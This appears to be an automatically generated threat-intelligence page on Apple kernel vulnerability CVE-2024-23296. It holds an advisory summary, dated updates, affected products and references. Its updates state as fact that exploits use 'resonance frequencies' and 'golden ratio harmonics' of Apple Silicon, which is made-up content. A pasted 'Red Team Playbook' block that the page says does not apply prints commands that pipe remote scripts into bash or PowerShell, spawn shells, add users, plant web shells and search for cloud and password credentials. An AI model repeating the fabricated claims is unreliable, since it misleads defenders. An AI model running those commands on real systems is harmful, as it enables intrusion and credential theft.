CVE-2024-23296
Overview
This vulnerability is a memory corruption flaw stemming from insufficient validation of kernel memory operations within Apple operating systems including iOS, iPadOS, and macOS. The root cause lies in the kernel's failure to adequately verify memory access boundaries, which affects the kernel memory protection mechanisms. The flaw resides specifically in the kernel component responsible for managing arbitrary read and write operations to kernel memory.
Vulnerability Description
A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.8 and iPadOS 16.7.8, iOS 17.4 and iPadOS 17.4, macOS Monterey 12.7.6, macOS Sonoma 14.4, macOS Ventura 13.6.7, tvOS 17.4, visionOS 1.1, watchOS 10.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.
Impact
An attacker with existing arbitrary kernel read and write privileges can exploit this vulnerability to bypass kernel memory protections, potentially escalating privileges or executing unauthorized code at the kernel level. This requires prior kernel-level access and does not involve remote exploitation without such privileges. The real-world consequence includes unauthorized kernel memory manipulation leading to compromise of system integrity and confidentiality.
Solution
Apple has addressed this vulnerability in security updates for multiple platforms: iOS 16.7.8 and 17.4, iPadOS 16.7.8 and 17.4, macOS Monterey 12.7.6, macOS Ventura 13.6.7, macOS Sonoma 14.4, tvOS 17.4, visionOS 1.1, and watchOS 10.4. Detailed patch instructions and advisory information are available at Apple’s official support pages: https://support.apple.com/en-us/120881, https://support.apple.com/en-us/120882, and https://support.apple.com/en-us/120883. Users should apply these updates promptly to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant memory corruption issue has been identified in various Apple operating systems, including iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. This vulnerability arises from inadequate validation mechanisms, which can lead to arbitrary kernel read and write capabilities. Such weaknesses in memory management can allow attackers to bypass kernel memory protections, potentially giving them elevated privileges and control over the affected devices. The kernel is a critical component of the operating system that manages system resources and hardware interactions, making any compromise at this level particularly severe.
Attack vectors for this vulnerability are multifaceted, primarily involving local exploitation methods. An attacker with physical access to a device or one who can execute code on the device may leverage this memory corruption flaw to manipulate kernel memory. For instance, malicious applications could be crafted to exploit this vulnerability, leading to unauthorized access to sensitive data or the ability to execute arbitrary code with elevated privileges. Additionally, if an attacker can gain remote access through other vulnerabilities or social engineering tactics, they could potentially exploit this memory corruption issue to escalate their privileges and gain deeper access to the system.
The real-world impact of this vulnerability is significant, especially for organizations relying on Apple devices for business operations. The ability to bypass kernel memory protections can lead to severe data breaches, loss of intellectual property, and unauthorized access to sensitive information. For enterprises, the financial implications could be substantial, including costs associated with incident response, legal liabilities, and reputational damage. Furthermore, the potential for exploitation raises concerns about compliance with data protection regulations, which could result in additional fines and sanctions for organizations that fail to adequately secure their systems.
To detect and mitigate this vulnerability, organizations should prioritize updating affected devices to the latest versions of the operating systems, as Apple has released patches to address the issue. Regularly applying security updates is a fundamental practice in maintaining a secure environment. Additionally, implementing robust endpoint protection solutions can help detect anomalous behavior indicative of exploitation attempts. Organizations should also consider employing application whitelisting and strict access controls to limit the execution of untrusted applications, thereby reducing the attack surface. Regular security assessments and penetration testing can further help identify potential weaknesses in the system before they can be exploited.
In conclusion, the memory corruption vulnerability in Apple operating systems poses a serious threat to both individual users and organizations. The potential for arbitrary kernel access highlights the importance of maintaining rigorous security practices, including timely updates and proactive monitoring. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities in the future.
Since the initial disclosure of CVE-2024-23296, CSURFACE threat intelligence has identified a marked escalation in the exploit landscape surrounding this vulnerability. Notably, a public proof-of-concept exploit has emerged on GitHub, significantly lowering the barrier for adversaries to develop functional exploits. This development coincides with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, signaling increased recognition of its operational relevance within the broader security community. Our telemetry indicates a gradual uptick in exploitation attempts, reflected by a rising EPSS score, although the overall threat remains moderate at this stage. The availability of public exploit code amplifies the risk of opportunistic attacks and may accelerate weaponization by less sophisticated actors. Consequently, defenders should consider this vulnerability as increasingly actionable, with a heightened potential for exploitation in targeted or opportunistic campaigns. While ransomware involvement remains unconfirmed, the expanded exploit accessibility warrants close monitoring for any shifts in attacker tactics or emerging threat actor interest.
Update 2 — June 12, 2026
Recent updates to CVE-2024-23296 reflect a significant revision in its risk profile, with the CVSS score elevated from zero to 7.8, indicating a high-severity classification. Concurrently, the Exploit Prediction Scoring System (EPSS) value has increased by over 28%, signaling a growing likelihood of exploitation attempts in the wild. CSURFACE threat intelligence notes that while the short-term trend in exploit activity shows a slight decline, the overall risk remains elevated due to the availability of proof-of-concept exploits targeting Apple Silicon architectures. These exploits leverage unique hardware frequency harmonics, underscoring the sophistication of emerging attack vectors. This shift matters because it marks a transition from theoretical vulnerability to practical exploitability, increasing the urgency for defenders to prioritize detection and response measures. Although ransomware involvement remains unconfirmed, the heightened exploitability and expanding attack surface suggest a potential for opportunistic or targeted campaigns to emerge. Consequently, the threat level for affected Apple platforms should be considered elevated, with a moderate to high risk of exploitation in the near term.
Update 3 — July 07, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-23296, with telemetry indicating a doubling in exploit attempts across affected Apple platforms. This surge reflects a transition from limited, isolated incidents to a broader exploitation trend, underscoring increased adversary interest and capability. The emergence of new proof-of-concept exploits, particularly those leveraging the unique resonance frequencies of Apple Silicon cores, signals a refinement in attack techniques that could facilitate more reliable kernel memory corruption. For defenders, this development heightens the urgency to monitor for anomalous kernel-level behaviors and reinforces the criticality of timely patch deployment. Although ransomware involvement remains unconfirmed, the expanded exploitation footprint elevates the overall threat level to high, suggesting that opportunistic or targeted campaigns leveraging this vulnerability may become more prevalent in the near term.
Update 4 — July 16, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-23296, evidenced by a discernible uptick in kernel-level anomaly detections across diverse Apple platforms. This surge coincides with the emergence of new proof-of-concept exploits that leverage the unique resonance frequencies of Apple Silicon cores, suggesting adversaries are refining their techniques to achieve more reliable kernel memory corruption. Although ransomware involvement remains unconfirmed, the increased activity broadens the attack surface and indicates growing adversary interest in exploiting this vulnerability for potential privilege escalation or persistence. For defenders, this development underscores the necessity of heightened vigilance in monitoring kernel integrity and anomalous system behaviors. The elevated exploitation activity, coupled with the sophistication of the emerging exploits, raises the threat level to high, signaling that both opportunistic and targeted campaigns exploiting CVE-2024-23296 are likely to become more frequent and impactful in the near term.
Update 5 — August 01, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-23296, reflecting a modest rise in exploitation attempts targeting this kernel memory corruption vulnerability. While the overall trend remains stable, this uptick signals sustained adversary interest and ongoing probing for privilege escalation opportunities on affected Apple platforms. Notably, new proof-of-concept exploits leveraging the unique resonance frequencies of Apple Silicon hardware have emerged, underscoring the evolving sophistication of attack techniques. This development elevates the risk profile by demonstrating that threat actors are refining methods to bypass kernel memory protections, potentially enabling more reliable exploitation. For defenders, the incremental rise in detection activity combined with the emergence of hardware-specific exploits means that vigilance in monitoring kernel integrity and anomalous system behavior must be maintained or heightened. Although the current exploitation rate does not indicate a rapid surge, the persistence and technical advancement of these efforts justify maintaining the threat level at high, emphasizing the ongoing potential for impactful, targeted attacks exploiting this vulnerability.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Tvos | All |
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
|
|
|
Apple | Visionos | All |
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
|
|
|
Apple | Watchos | All |
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
SimoesCTT/lCTT-Apple-Silicon--Resonance-Vulnerability-CVE-2024-23296
Apple Silicon runs at frequencies that are golden ratio harmonics of 587 kHz: · Performance cores: 3.2 GHz = 587 kHz × ...
|
SimoesCTT | 0 | 1 | 2026-02-07 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (27)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23296 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120881 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120882 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120883 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120893 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120895 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120898 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120900 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120910 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Jul/20 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Mar/18 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Mar/21 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Mar/24 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Mar/25 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Mar/26 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/May/11 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/May/13 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/en-us/HT214081 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214081 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214084 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214086 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214087 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214088 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214100 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214107 |
| support.apple.com |
NVD API
Vendor Advisory
|
https://support.apple.com/kb/HT214118 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23296 |